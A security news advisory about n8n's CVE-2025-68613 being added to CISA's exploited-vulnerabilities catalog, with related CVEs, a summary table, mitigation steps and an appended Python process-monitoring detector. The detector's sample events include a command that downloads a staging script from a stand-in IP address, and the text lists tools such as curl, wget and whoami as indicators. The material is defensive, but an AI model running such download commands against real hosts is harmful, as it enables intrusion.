
CISA Lists n8n Automation Platform in Known Exploited Vulnerabilities Catalog

CISA added n8n's CVE-2025-68613 (CVSS 9.9) to its KEV catalog after Zerobot botnet exploitation. Federal agencies must patch by March 25, 2026.


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical remote code execution (RCE) flaw in the n8n AI workflow automation platform to its Known Exploited Vulnerabilities (KEV) catalog on March 11, 2026, following confirmed active exploitation in the wild. The action compels Federal Civilian Executive Branch (FCEB) agencies to remediate affected instances by March 25, 2026, under Binding Operational Directive BOD 22-01 and signals a broadening threat model for enterprise AI automation tooling that security teams across all sectors must address.

Background

n8n is an open-source, Node.js-based workflow automation platform widely deployed across enterprise IT environments to connect SaaS applications, APIs, cloud services, and internal systems. The platform serves roughly 230,000 active users and supports over 400 third-party integrations, making it a high-value target for adversaries seeking a centralized point of compromise within modern IT supply chains.

The initial vulnerability, tracked as CVE-2025-68613 and rated 9.9 on the CVSS scale, was disclosed by n8n developers on December 19, 2025. The flaw resides in n8n's server-side expression evaluation engine, where improperly controlled code resources allow authenticated users with workflow creation or editing permissions to inject malicious expressions that escape sandbox boundaries and execute arbitrary code with the privileges of the underlying n8n process. According to Resecurity, exploitation collapses all trust boundaries within the platform, enabling attackers to "operate with the same authority as the automation platform itself."

Active exploitation of CVE-2025-68613 was first publicly reported in mid-January 2026, when Akamai's security intelligence and response team observed the Zerobot botnet, a Mirai-based threat known for targeting IoT devices, leveraging the vulnerability to compromise internet-facing n8n instances.

Details

The scope of exposure has remained persistently large. Censys reported 103,476 potentially vulnerable n8n instances as of December 22, 2025, with the majority located in the United States, Germany, France, Brazil, and Singapore. As of early February 2026, Shadowserver Foundation data indicated over 24,700 unpatched instances remained publicly exposed, and Intel 471 observed 71,537 exposed instances worldwide as of March 16, 2026.

The CVE-2025-68613 disclosure triggered a cascade of related vulnerability reports. Researchers at Pillar Security identified two additional maximum-severity flaws (CVSS 10.0), documented under GitHub advisory GHSA-6cqr-8cfr-67f8, one of which bypassed the initial patch within 24 hours of its deployment. n8n addressed both in version 2.4.0, released in January 2026. A separate vulnerability, CVE-2026-21858 (CVSS 10.0), also disclosed in early 2026, allows unauthenticated attackers to achieve RCE through improper webhook handling, according to The Register. CVE-2025-68668, rated 9.9, was disclosed by Cyera Research Labs in January 2026 and exploits n8n's Pyodide-backed Python execution environment to escape the sandbox via blocklist bypass.

Eilon Cohen, an AI security researcher at Pillar Security, stated that the vulnerabilities expose "OpenAI keys, Anthropic credentials, AWS accounts and the ability to intercept or modify AI interactions in real-time, all while the workflows continue functioning normally."

The threat surface extends beyond direct CVE exploitation. Cisco Talos research identified a 686% increase in malicious emails embedding n8n webhook URLs between January 2025 and March 2026, with threat actors abusing the platform's legitimate infrastructure to bypass email security filters, deliver remote access tools, and fingerprint target devices. Observed phishing campaigns employed CAPTCHA-protected landing pages to deliver modified versions of Datto RMM and ITarian Endpoint Management software.

CVE Summary Table

CVE ID           CVSS   Type                             Disclosed   Fixed In            Status
CVE-2025-68613   9.9    Expression Injection / RCE       Dec 2025    v1.120.4-v1.122.0   KEV Listed
CVE-2025-68668   9.9    Pyodide Sandbox Escape / RCE     Jan 2026    v2.0.0              Active
CVE-2026-21858   10.0   Unauthenticated RCE (Webhook)    Jan 2026    v2.4.0              Active
CVE-2026-27577   9.4    Expression Evaluation Bypass     Feb 2026    v2.4.0              Patched

Incident Response and Mitigation Steps

Security teams operating n8n deployments should prioritize the following actions, based on guidance from CISA, Pillar Security, Resecurity, and Intel 471:

  1. Upgrade immediately to n8n version 2.4.0 or later. Environments that applied partial mitigations to CVE-2025-68613 remain exposed and must still upgrade.
  2. Rotate all stored credentials. Treat all API keys, OAuth tokens, cloud provider credentials, and database passwords accessible via n8n workflows as potentially compromised.
  3. Restrict workflow permissions to a minimal, verified set of users. Audit all existing role assignments and remove standing access not tied to active operational requirements.
  4. Harden deployment environments by isolating n8n instances from public internet exposure, applying OS-level least-privilege configurations, and placing instances behind a VPN or reverse proxy.
  5. Implement behavioral monitoring for indicators such as anomalous child process execution (id, whoami, wget, curl), unauthorized workflow modifications, and unexpected outbound connections from the n8n host.
  6. Share indicators of compromise (including webhook URL structures, malicious file hashes, and C2 domains) with threat intelligence communities such as Cisco Talos Intelligence and Shadowserver.
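One way to implement the behavioral monitoring in step 5, as an added example that is not from the article or the n8n project: a small detector run over constructed process-start events that flags the listed binaries when their parent command line is the n8n service. The event format, the n8n install path, and the sample hosts are assumptions.

```python
import json
import os
import shlex

# Binaries the guidance above lists as anomalous children of the n8n process.
SUSPICIOUS_CHILDREN = {"id", "whoami", "wget", "curl"}

# Constructed sample telemetry (not real logs): one JSON process-start event per
# line, loosely modelled on execve-style EDR/auditd output. Paths are assumed.
SAMPLE_EVENTS = """\
{"ts":"2026-03-12T10:00:01Z","pid":901,"ppid":412,"parent_cmd":"node /usr/local/lib/node_modules/n8n/bin/n8n","cmd":"whoami"}
{"ts":"2026-03-12T10:00:02Z","pid":902,"ppid":412,"parent_cmd":"node /usr/local/lib/node_modules/n8n/bin/n8n","cmd":"curl -s http://203.0.113.10/stage.sh -o /tmp/stage.sh"}
{"ts":"2026-03-12T10:00:03Z","pid":903,"ppid":1,"parent_cmd":"/sbin/init","cmd":"curl https://updates.example.com/check"}
{"ts":"2026-03-12T10:00:04Z","pid":904,"ppid":412,"parent_cmd":"node /usr/local/lib/node_modules/n8n/bin/n8n","cmd":"git status"}
"""

def spawned_by_n8n(event):
    """True when the parent command line is the n8n service (assumed path layout)."""
    return "n8n" in event.get("parent_cmd", "")

def remote_hosts(argv):
    """Hostnames/IPs referenced as URLs in the child's argument vector."""
    hosts = []
    for arg in argv:
        if arg.startswith(("http://", "https://")):
            hosts.append(arg.split("://", 1)[1].split("/", 1)[0])
    return hosts

def detect(lines):
    """Return one alert per suspicious child process spawned by n8n."""
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if not spawned_by_n8n(ev):
            continue
        argv = shlex.split(ev["cmd"])
        binary = os.path.basename(argv[0])
        if binary not in SUSPICIOUS_CHILDREN:
            continue
        alerts.append({
            "ts": ev["ts"],
            "pid": ev["pid"],
            "binary": binary,
            # wget/curl children also mark an outbound connection worth reviewing.
            "kind": "download" if binary in ("wget", "curl") else "recon",
            "hosts": remote_hosts(argv),
        })
    return alerts
```

The systemd-spawned curl and the git child are ignored; only the whoami and curl events under the n8n parent produce alerts, the latter carrying the contacted host for correlation with outbound-connection telemetry.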

Outlook

As of Q1 2026, 121 CVEs with AI relevance had been identified, a figure consistent with rising AI component adoption across the software stack, according to BackBox. The n8n incident is expected to accelerate enterprise scrutiny of third-party automation platforms as critical supply chain components. Organizations scaling AI-driven workflow infrastructure should treat automation platforms as high-risk attack surfaces and integrate them into formal vulnerability management, change control, and incident response programs.